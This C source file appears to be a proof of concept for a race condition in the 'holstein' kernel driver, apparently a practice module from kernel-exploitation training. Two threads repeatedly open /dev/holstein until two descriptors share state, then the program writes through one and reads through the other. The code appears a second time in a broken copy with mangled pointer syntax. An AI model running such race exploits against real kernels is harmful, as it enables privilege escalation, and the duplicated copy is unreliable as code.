brant-ruan/race_poc.c

## race_poc.c
#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

int win = 0;

void *race(void *arg) {
    while (1) {
        while (!win) {
            int fd = open("/dev/holstein", O_RDWR);
            if (fd == 4)
                win = 1;
            if (win == 0 && fd != -1)
                close(fd);
        }
        if (write(3, "A", 1) != 1 || write(4, "a", 1) != 1) {
            close(3);
            close(4);
            win = 0;
        } else
            break;
    }
    return NULL;
}

int main() {
    pthread_t th1, th2;
    puts("[*] running thread 1 and thread 2");

    pthread_create(&th1, NULL, race, NULL);
    pthread_create(&th2, NULL, race, NULL);
    pthread_join(th1, NULL);
    pthread_join(th2, NULL);

    puts("[+] reached race condition");

    char buf[0x400] = {0};
    int fd1 = 3, fd2 = 4;
    puts("[*] writing \'aptx4869\' into fd 3");
    write(fd1, "aptx4869", 9);
    puts("[*] reading from fd 4");
    read(fd2, buf, 9);
    printf("[+] content: %s\n", buf);

    return 0;
}
	#include <fcntl.h>
	#include <pthread.h>
	#include <stdio.h>
	#include <sys/stat.h>
	#include <sys/types.h>
	#include <unistd.h>

	int win = 0;

	void race(void arg) {
	while (1) {
	while (!win) {
	int fd = open("/dev/holstein", O_RDWR);
	if (fd == 4)
	win = 1;
	if (win == 0 && fd != -1)
	close(fd);
	}
	if (write(3, "A", 1) != 1 \|\| write(4, "a", 1) != 1) {
	close(3);
	close(4);
	win = 0;
	} else
	break;
	}
	return NULL;
	}

	int main() {
	pthread_t th1, th2;
	puts("[*] running thread 1 and thread 2");

	pthread_create(&th1, NULL, race, NULL);
	pthread_create(&th2, NULL, race, NULL);
	pthread_join(th1, NULL);
	pthread_join(th2, NULL);

	puts("[+] reached race condition");

	char buf[0x400] = {0};
	int fd1 = 3, fd2 = 4;
	puts("[*] writing \'aptx4869\' into fd 3");
	write(fd1, "aptx4869", 9);
	puts("[*] reading from fd 4");
	read(fd2, buf, 9);
	printf("[+] content: %s\n", buf);

	return 0;
	}